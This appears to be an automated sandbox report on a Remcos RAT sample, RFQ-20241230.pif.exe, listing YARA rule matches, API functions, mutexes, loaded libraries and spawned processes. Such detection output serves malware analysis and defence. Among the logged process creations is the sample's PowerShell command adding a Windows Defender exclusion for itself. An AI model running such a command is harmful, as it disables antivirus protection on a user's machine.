                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041BB87 SystemParametersInfoW,5_2_0041BB87

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ-20241230.pif.exe
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004158B9
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_095F2F700_2_095F2F70
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_095F37E00_2_095F37E0
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_095F33A80_2_095F33A8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_095F3C180_2_095F3C18
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_01375E6C0_2_01375E6C
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_01377AA80_2_01377AA8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BD61C40_2_05BD61C4
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BD62F80_2_05BD62F8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BDDC480_2_05BDDC48
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BD4AC00_2_05BD4AC0
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BDE2600_2_05BDE260
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_05BDE2500_2_05BDE250
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_076218BC0_2_076218BC
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 0_2_076223400_2_07622340
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004520E25_2_004520E2
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041D0815_2_0041D081
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043D0A85_2_0043D0A8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004371605_2_00437160
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004361BA5_2_004361BA
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004262645_2_00426264
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004313875_2_00431387
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043652C5_2_0043652C
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041E5EF5_2_0041E5EF
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0044C7495_2_0044C749
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004367D65_2_004367D6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004267DB5_2_004267DB
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043C9ED5_2_0043C9ED
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00432A595_2_00432A59
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00436A9D5_2_00436A9D
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043CC1C5_2_0043CC1C
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00436D585_2_00436D58
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00434D325_2_00434D32
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043CE4B5_2_0043CE4B
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00440E305_2_00440E30
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00426E835_2_00426E83
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00412F455_2_00412F45
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00452F105_2_00452F10
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00426FBD5_2_00426FBD
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: String function: 004020E7 appears 41 times
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: String function: 00433FC0 appears 55 times
                Source: RFQ-20241230.pif.exeBinary or memory string: OriginalFilename vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1360288843.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1365241211.00000000075F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1358434639.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exeBinary or memory string: OriginalFilenameDyIa.exe2 vs RFQ-20241230.pif.exe
                Source: RFQ-20241230.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: RFQ-20241230.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@7/6@0/1
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_00416AB7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,5_2_0040E219
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,5_2_0041A64F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-20241230.pif.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-4WOIVV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upatqsuf.jwx.ps1Jump to behavior
                Source: RFQ-20241230.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ-20241230.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RFQ-20241230.pif.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: textshaping.dllJump to behavior
